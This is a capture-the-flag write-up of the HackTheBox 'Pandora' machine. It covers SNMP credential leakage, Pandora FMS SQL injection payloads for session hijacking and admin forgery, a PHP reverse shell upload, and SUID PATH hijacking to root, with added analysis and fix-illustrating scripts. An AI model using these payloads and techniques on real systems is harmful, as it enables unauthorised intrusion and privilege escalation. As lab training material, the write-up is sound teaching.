Pandora - [HTB]

Cover Image for Pandora - [HTB]


Pandora is an easy Linux machine from HackTheBox where you will enumerate the SNMP service in order to find a process whose command line contains credentials passed as parameters. These credentials give SSH access to the machine as daniel. Then there is a Pandora FMS console that is only reachable from localhost, requiring port forwarding in order to exploit several vulnerabilities in that Pandora FMS version. Finally, you will have to exploit a path hijacking weakness in a SUID binary to become root.


As always, let's start by scanning all open ports on the box with Nmap.

kali@kali:~/Documents/HTB/Pandora$ nmap -vv -sS -p- -n -T5 -oN AllPorts.txt
Nmap scan report for
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2022-01-10 11:41:31 EST for 229s
Not shown: 65533 closed ports
Reason: 65533 resets
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sU -sC -sV
Nmap scan report for
Host is up (0.17s latency).
Not shown: 916 closed ports, 83 open|filtered ports
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 4h00m19s
| snmp-interfaces:
|   lo
|     IP address:  Netmask:
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 1.26 Mb sent, 1.26 Mb received
|   VMware VMXNET3 Ethernet Controller
|     IP address:  Netmask:
|     MAC address: 00:50:56:b9:c2:f0 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 5.74 Mb sent, 6.19 Mb received
| snmp-netstat:
|   TCP 
|   TCP
|   TCP
|   TCP
|   UDP           *:*
|   UDP          *:*
|_  UDP        *:*
| snmp-processes:
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 4h00m19.29s (1441929 timeticks)
Service Info: Host: pandora

Then, we continue with a deeper scan of every open port, getting more information about each service.

kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80
Nmap scan report for
Host is up (0.045s latency).

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking on the web page for hostnames to add to /etc/hosts, we obtain the following.

kali@kali:~/Documents/HTB/Pandora$ curl 2>/dev/null | grep \.htb

Accessing the web page, we can read about a monitoring solution.

Panda web page

Because UDP port 161 is open with the public community string, let's use snmpwalk to enumerate the service. The output is long, but the process table (HOST-RESOURCES-MIB::hrSWRunParameters, i.e. the argv of every running process) exposes a command with credentials passed as parameters.

kali@kali:~/Documents/HTB/Pandora$ snmpwalk -v 2c panda.htb -c public | tee snmpwalk.txt
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"

These credentials can be used to log in as the user daniel through SSH.
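An added triage helper (example code written for this writeup, not part of the original post or of any tool): it parses snmpwalk's hrSWRunParameters lines and flags processes whose command line carries a user/password flag, which is what a reviewer of an SNMP dump wants to find quickly instead of reading thousands of lines. The input below is a constructed sample modelled on the line above; the extra entries, their pids and the Winter2021! password are made up to show what does and does not get flagged.

```python
import re

# Constructed sample of snmpwalk output. The pid 972 line is the kind of entry
# found on the box (hrSWRunParameters lists each process's argv); the others are
# made-up entries to show what is and is not flagged.
SAMPLE_SNMPWALK = r'''
HOST-RESOURCES-MIB::hrSWRunName.972 = STRING: "bash"
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.1024 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1100 = STRING: "--password-file /etc/app/secret"
HOST-RESOURCES-MIB::hrSWRunParameters.1207 = STRING: "--user=backup --password=Winter2021!"
'''

PARAM_RE = re.compile(
    r'^HOST-RESOURCES-MIB::hrSWRunParameters\.(?P<pid>\d+) = STRING: "(?P<args>.*)"$'
)
# Flags that normally carry a secret (or the matching user name) as their value.
USER_RE = re.compile(r'(?:^|\s)(?:-u|--user(?:name)?)[=\s]+(?P<user>[^\s\'"]+)')
PASS_RE = re.compile(r'(?:^|\s)(?:-p|--pass(?:word)?)[=\s]+(?P<password>[^\s\'"]+)')


def parse_run_parameters(text):
    """Map pid -> argument string for every hrSWRunParameters entry."""
    procs = {}
    for line in text.splitlines():
        m = PARAM_RE.match(line.strip())
        if m:
            procs[int(m.group("pid"))] = m.group("args")
    return procs


def find_credentials(text):
    """Return one dict per process whose argv carries a password flag.

    --password-file style flags are deliberately not matched: they point at a
    file, not at the secret itself.
    """
    hits = []
    for pid, args in sorted(parse_run_parameters(text).items()):
        pm = PASS_RE.search(args)
        if not pm:
            continue
        um = USER_RE.search(args)
        hits.append({"pid": pid,
                     "user": um.group("user") if um else None,
                     "password": pm.group("password")})
    return hits


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_SNMPWALK):
        print(f"pid {hit['pid']}: user={hit['user']} password={hit['password']}")
```

Feed it the saved snmpwalk.txt (for instance with `find_credentials(open("snmpwalk.txt").read())`) to get the same result on a real dump; anything SNMP exposes here is visible to everyone who knows the community string, which is the lesson of this step.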

Privilege Escalation 1

By enumerating the machine we find a virtual host that is only reachable via localhost. Note the AssignUserID directive (Apache mpm-itk): requests to this vhost are handled by a worker running as matt, so anything we execute through it runs as matt.

daniel@pandora:~$ cat /etc/apache2/sites-available/pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

To reach it from our machine, we forward a local port to the box's port 80 over SSH. Binding local port 80 needs root on the attacking machine; a high port such as 8080 works just as well if you adjust the URLs below.

kali@kali:~/Documents/HTB/Pandora$ ssh -L localhost:80:localhost:80 daniel@panda.htb -fN

Now we can reach the Pandora FMS console at http://localhost/pandora_console/.

Pandora console

As the screenshot shows, the Pandora FMS version number is printed on the console's landing page. Searching for vulnerabilities in that version turns up the following post, which explains an unauthenticated SQL injection in include/chart_generator.php through the session_id parameter (CVE-2021-32099) that can be used to bypass the login. However, the proof of concept in it does not show the payload.

There are two ways of exploiting this part:

  1. Using the SQLi alone to take over matt's existing session, so that our browser holds a PHPSESSID that belongs to matt. Then we need a second, authenticated vulnerability to get RCE.
  2. Using the SQLi together with PHP's session deserialisation to forge an admin session, and uploading a PHP reverse shell from the console's File Manager.

Exploitation 1

The payload to log in as matt is the following. The injected subquery selects an existing session id from tsessions_php whose data mentions matt, so chart_generator.php loads matt's session instead of ours; after visiting this URL, opening http://localhost/pandora_console/ shows the console logged in as matt. This relies on matt currently having a session row in the table.

http://localhost/pandora_console/include/chart_generator.php?session_id=' OR `id_session`=(SELECT id_session from tsessions_php where data like '%matt%' LIMIT 1) LIMIT 1 -- -

Then, this post explains how to obtain Remote Command Execution via the Events feature.

Exploitation 2

The payload to log in as admin is the following. The UNION row supplies the three columns of tsessions_php: the first is your own PHPSESSID cookie value (so the forged row is bound to the session your browser sends), the second is the last_active timestamp, and the third is PHP session-serialised data declaring id_usuario as admin. The 5 in s:5 must equal the length of admin or PHP rejects the value, and no closing quote or comment is needed because the quote that ends the original query's string literal closes ours.

http://localhost/pandora_console/include/chart_generator.php?session_id=-1' UNION SELECT '<YOUR_PHPSESSID>', NULL, 'id_usuario|s:5:"admin";
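To see exactly why both payloads work, here is an added example (not Pandora's code; written for this writeup) that rebuilds the vulnerable lookup against an in-memory SQLite stand-in for tsessions_php, runs the matt and admin payloads through it, and decodes the PHP session-serialised data column (id_usuario|s:5:"admin";) that the UNION row injects. The table rows, the session ids (sess_matt, sess_guest, YOURSESSID) and the exact shape of the query are assumptions; the parameterised query at the end shows the fix.

```python
import sqlite3

# Constructed stand-in for Pandora's tsessions_php table, with the three
# columns the UNION payload targets (id_session, last_active, data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tsessions_php (id_session TEXT, last_active INTEGER, data TEXT)")
    conn.executemany("INSERT INTO tsessions_php VALUES (?, ?, ?)", [
        ("sess_guest", 1641830000, 'id_usuario|s:5:"guest";'),
        ("sess_matt", 1641831000, 'id_usuario|s:4:"matt";'),
    ])
    return conn


# Shape of the vulnerable lookup (assumed from the behaviour described above,
# not Pandora's own code): the session id is pasted straight into the SQL.
def lookup_session_vulnerable(conn, session_id):
    sql = "SELECT * FROM tsessions_php WHERE id_session = '" + session_id + "'"
    return conn.execute(sql).fetchone()


# The fix: a bound parameter, so quotes inside the payload are just data.
def lookup_session_safe(conn, session_id):
    return conn.execute("SELECT * FROM tsessions_php WHERE id_session = ?",
                        (session_id,)).fetchone()


MATT_PAYLOAD = ("' OR `id_session`=(SELECT id_session from tsessions_php "
                "where data like '%matt%' LIMIT 1) LIMIT 1 -- -")
# 'YOURSESSID' stands for the PHPSESSID cookie your browser already holds.
ADMIN_PAYLOAD = "-1' UNION SELECT 'YOURSESSID', NULL, 'id_usuario|s:5:\"admin\";"


def parse_php_session(data):
    """Decode PHP session serialisation (key|value;key|value;) for scalar types."""
    result, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        key = data[pos:bar]
        result[key], pos = _parse_value(data, bar + 1)
    return result


def _parse_value(data, pos):
    t = data[pos]
    if t == "N":                      # N;
        return None, pos + 2
    if t in "ibd":                    # i:42;  b:1;  d:1.5;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        val = {"i": int, "b": lambda v: v == "1", "d": float}[t](raw)
        return val, end + 1
    if t == "s":                      # s:<len>:"<text>";  <len> must match exactly
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2
        text = data[start:start + length]
        if data[start + length:start + length + 2] != '";':
            raise ValueError("string length does not match at offset %d" % pos)
        return text, start + length + 2
    raise ValueError("unsupported type %r at offset %d" % (t, pos))


if __name__ == "__main__":
    conn = make_db()
    for name, payload in (("matt", MATT_PAYLOAD), ("admin", ADMIN_PAYLOAD)):
        row = lookup_session_vulnerable(conn, payload)
        print(name, "payload ->", row[0], parse_php_session(row[2]))
        print("  parameterised query ->", lookup_session_safe(conn, payload))
```

The matt payload returns matt's real row; the admin payload returns a row that never existed in the table, keyed by our own cookie and carrying data that deserialises to id_usuario = admin. With the bound parameter both payloads return nothing, because the whole string is compared as one session id.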

Now, under Admin tools / File Manager we can upload an arbitrary PHP file, for instance Kali's /usr/share/laudanum/php/php-reverse-shell.php (after setting the callback IP and port inside it); uploads are stored under the /images/ directory of the console.

kali@kali:~/Documents/HTB/Pandora$ nc -nlvp 443
listening on [any] 443 ...
kali@kali:~/Documents/HTB/Pandora$ curl -s http://localhost/pandora_console/images/shell.php &
connect to [] from (UNKNOWN) [] 34170
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 21:23:15 up  7:56,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0     17:29   35.00s  0.72s  0.72s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)

The shell comes back as matt, not www-data, because of the AssignUserID directive in the virtual host.

Privilege Escalation 2

Thanks to linpeas, we can see a SUID binary owned by root whose mode (-rwsr-x---, group matt) means only matt can execute it.

╔══════════╣ SUID - Check easy privesc, exploits and write perms
-rwsr-x--- 1 root   matt        17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

With ltrace, we can see that the binary calls system() with a bare tar command rather than an absolute path, so we can hijack it through PATH to become root. Note that ptrace-based tools such as ltrace make the kernel ignore the SUID bit, which is why getuid() and geteuid() return 1000 here and tar fails with Permission denied on /root/.backup; the trace still shows the command string we need.

matt@pandora:/$ ltrace /usr/bin/pandora_backup
getuid()                                                  = 1000
geteuid()                                                 = 1000
setreuid(1000, 1000)                                      = 0
puts("PandoraFMS Backup Utility")                         = 26
PandoraFMS Backup Utility
puts("Now attempting to backup Pandora"...)               = 43
Now attempting to backup PandoraFMS client
system("tar -cvf /root/.backup/pandora-b"... <no return ...>
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
--- SIGCHLD (Child exited) ---
<... system resumed> )                                    = 512
puts("Backup failed!\nCheck your permis"...)              = 39
Backup failed!
Check your permissions!
+++ exited (status 1) +++

However, the SUID bit is not honoured from the reverse shell: it inherits the restrictions of the Apache worker that mpm-itk spawned for the matt vhost. You can check this in the reverse shell with grep NoNewPrivs /proc/$$/status; a value of 1 means the kernel ignores setuid bits for that process and everything it launches. So we need a normal login session as matt, which we get by adding our SSH public key and connecting through SSH.

matt@pandora:/home/matt$ mkdir /home/matt/.ssh/
matt@pandora:/home/matt$ chmod 0700 .ssh
matt@pandora:/home/matt$ echo "<attacker public key>" > /home/matt/.ssh/authorized_keys
matt@pandora:/home/matt$ chmod 0600 /home/matt/.ssh/authorized_keys
kali@kali:~/Documents/HTB/Pandora$ ssh matt@panda.htb

Finally, once logged in, we can become root with the following commands: we write a fake tar into /tmp, put /tmp at the front of PATH (note that it is export PATH=..., not export $PATH=..., which would expand the variable and fail) and run the SUID binary, which executes our script as root. The -p flag stops bash from dropping the elevated uid.

matt@pandora:~$ cd /tmp/
matt@pandora:/tmp$ echo "/bin/bash -p" > tar
matt@pandora:/tmp$ chmod +x tar
matt@pandora:/tmp$ export PATH=$(pwd):$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp# cat /root/root.txt
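As an added example (written for this writeup, not code from the box or from Pandora FMS), the following script emulates the shell's PATH lookup to show why the bare tar in system() is hijackable, lists the writable PATH entries that are searched before the real binary (the check to run against any SUID binary that shells out), and shows that calling tar by absolute path sidesteps the problem. Everything is sandboxed under a temporary directory; the tar source path in the command line is assumed, since the ltrace output above truncates it.

```python
import os
import shlex
import shutil
import stat
import tempfile


def program_name(cmdline):
    """The word the shell looks up in PATH: 'tar' for 'tar -cvf ...'."""
    return shlex.split(cmdline)[0]


def resolve_in_path(prog, path):
    """Emulate the shell's lookup: first executable match in PATH order."""
    if os.sep in prog:            # absolute or relative path: PATH is not consulted
        return prog
    for d in path.split(os.pathsep):
        cand = os.path.join(d, prog)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def hijackable_dirs(prog, path):
    """PATH entries the current user can write to that are searched before
    the first directory that actually contains prog."""
    hits = []
    for d in path.split(os.pathsep):
        if os.path.isfile(os.path.join(d, prog)):
            break
        if os.path.isdir(d) and os.access(d, os.W_OK):
            hits.append(d)
    return hits


def plant(directory, name, body):
    """Write an executable script into directory and return its path."""
    p = os.path.join(directory, name)
    with open(p, "w") as f:
        f.write(body)
    os.chmod(p, os.stat(p).st_mode | stat.S_IXUSR)
    return p


def demo():
    """Play the hijack out in a sandbox and report what resolved at each step."""
    base = tempfile.mkdtemp()
    sysdir = os.path.join(base, "usr_bin")       # stands in for /usr/bin
    attacker_dir = os.path.join(base, "tmp")     # stands in for /tmp
    os.mkdir(sysdir)
    os.mkdir(attacker_dir)
    plant(sysdir, "tar", "#!/bin/sh\necho real tar\n")
    # Command shape from the ltrace above; the source path is assumed.
    cmd = "tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora"
    prog = program_name(cmd)
    poisoned_path = attacker_dir + os.pathsep + sysdir
    report = {
        "prog": prog,
        "dirs": (sysdir, attacker_dir),
        "clean": resolve_in_path(prog, sysdir),              # sane PATH
        "hijackable": hijackable_dirs(prog, poisoned_path),  # the audit
    }
    plant(attacker_dir, prog, "#!/bin/sh\n/bin/bash -p\n")  # the fake tar
    report["poisoned"] = resolve_in_path(prog, poisoned_path)
    # The fix: an absolute path makes the PATH contents irrelevant.
    report["fixed"] = resolve_in_path(os.path.join(sysdir, prog), poisoned_path)
    shutil.rmtree(base)
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

hijackable_dirs is the useful part against a real target: call it with the program name from the ltrace output and the PATH the SUID binary will inherit, and any directory it lists is a place a fake binary will be picked up from. Resetting PATH inside the binary (or, better, calling /usr/bin/tar) is what the developer should have done.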